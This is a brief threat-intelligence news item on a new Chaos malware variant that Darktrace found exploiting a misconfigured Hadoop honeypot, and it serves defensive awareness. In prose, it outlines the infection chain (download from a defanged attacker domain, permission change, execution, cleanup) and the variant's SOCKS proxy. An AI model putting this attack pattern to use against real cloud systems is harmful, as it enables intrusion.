A new Chaos malware variant has emerged that targets misconfigured cloud deployments, expanding beyond its traditional focus on routers and edge devices. Darktrace identified the variant last month on its honeypot network, noting a deliberately misconfigured Hadoop instance enabled remote code execution to drop a Chaos agent.
The 64-bit ELF binary is an updated version of Chaos that reworks several functions while removing SSH-based spreading and router-exploit components, and it now includes a SOCKS proxy to route traffic and conceal malicious activity. Chaos was first documented by Lumen Black Lotus Labs in September 2022 as a cross‑platform malware capable of Windows and Linux operations, including remote shell commands, cryptocurrency mining, SSH brute-forcing, and DDoS via multiple protocols.
The attackers behind this variant may be Chinese in origin, a claimDarktrace highlights given the presence of Chinese language characters and China-based infrastructure. An application in the attack retrieved a Chaos agent binary from attacker-controlled pan.tenire[.]com, set permissive file access, executed the binary, and then cleaned up to reduce forensic traces.